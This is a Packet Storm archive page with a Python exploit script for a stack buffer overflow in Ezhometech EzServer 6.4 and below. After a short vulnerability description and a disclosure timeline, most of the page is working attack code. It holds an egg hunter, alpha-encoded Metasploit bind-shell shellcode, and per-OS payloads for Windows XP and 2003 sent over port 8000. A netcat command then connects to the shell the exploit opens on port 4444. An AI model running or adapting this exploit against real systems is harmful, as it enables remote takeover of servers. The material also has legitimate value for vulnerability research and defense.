exploit the possibilities

Ezhometech Ezserver 6.4 Stack Overflow

Ezhometech Ezserver 6.4 Stack Overflow
Posted Jun 19, 2012
Authored by modpr0be

Ezhometech Ezserver versions 6.4 and below stack buffer overflow exploit that binds a shell to port 4444.

tags | exploit, overflow, shell
MD5 | 37da3ca2a88bac7501228d78f10c734e

Ezhometech Ezserver 6.4 Stack Overflow

Change Mirror Download
# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/

### Software Description
# EZserver is a Video Server that stream Full HD to various devices.

### Vulnerability Details
# Buffer overflow condition exist in URL handling, sending long GET request
# will cause server process to exit and may allow malicious code injection.
# Further research found that the application does not care about the HTTP method,
# so that by sending long characters will make the program crash.

### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.

#!/usr/bin/python

import sys
import struct
from socket import *
from os import system
from time import sleep

hunt = (
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444,

shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"
"\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"
"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"
"\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"
"\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"
"\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"
"\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"
"\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"
"\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"
"\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"
"\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"
"\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"
"\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"
"\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"
"\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"
"\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"
"\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"
"\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"
"\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"
"\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"
"\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"
"\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"
"\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"
"\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"
"\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"
"\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"
"\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"
"\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"
"\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"
"\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"
"\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"
"\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"
"\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"
"\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"
"\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"
"\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"
"\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"
"\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"
"\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"
"\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"
"\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")

junk1 = "\x41" * 5025
junk2 = "\x42" * 5029
junk3 = "\x43" * 10000
buff = "w00tw00t"
buff+= shellcode
buff+= "\x90" * 100
buff+= "\xeb\x08\x90\x90"
buff+= struct.pack('<L', 0x10212779)
buff+= "\x90" * 16
buff+= hunt
buff+= "\x44" * 5000

def winxp():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk1+buff
s.send (payload)
s.close()
print "[+] Wait for hunter.."
sleep(5)
print "[+] Connecting to target shell!"
sleep(2)
system("nc -v %s 4444" %host)
except:
print "[x] Could not connect to the server x_x"
sys.exit()

def win2k3():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk2+buff
s.send(payload)
s.close()
print "[+] Wait for hunter.."
sleep(5)
print "[+] Connecting to target shell!"
sleep(1)
system("nc -v %s 4444" %host)
except:
print "[x] Could not connect to the server x_x"
sys.exit()

def crash():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk3
s.send (payload)
s.close()
print "[+] Server should be crashed! Check your debugger"
except:
print "[x] Could not connect to the server x_x"
sys.exit()

print "#################################################################"
print "# EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit #"
print "# by modpr0be[at]spentera | @modpr0be #"
print "# thanks to: otoy, cikumel, y0k | @spentera #"
print "================================================================="
print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "\t3.Crash only (debug)\n"

a = 0
while a < 3:
a = a + 1
op = input ("[!] Choose your target OS: ")
if op == 1:
winxp()
sys.exit()
elif op == 2:
win2k3()
sys.exit()
elif op == 3:
crash()
sys.exit()
else:
print "[-] Oh plz.. pick the right one :)\r\n"

Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close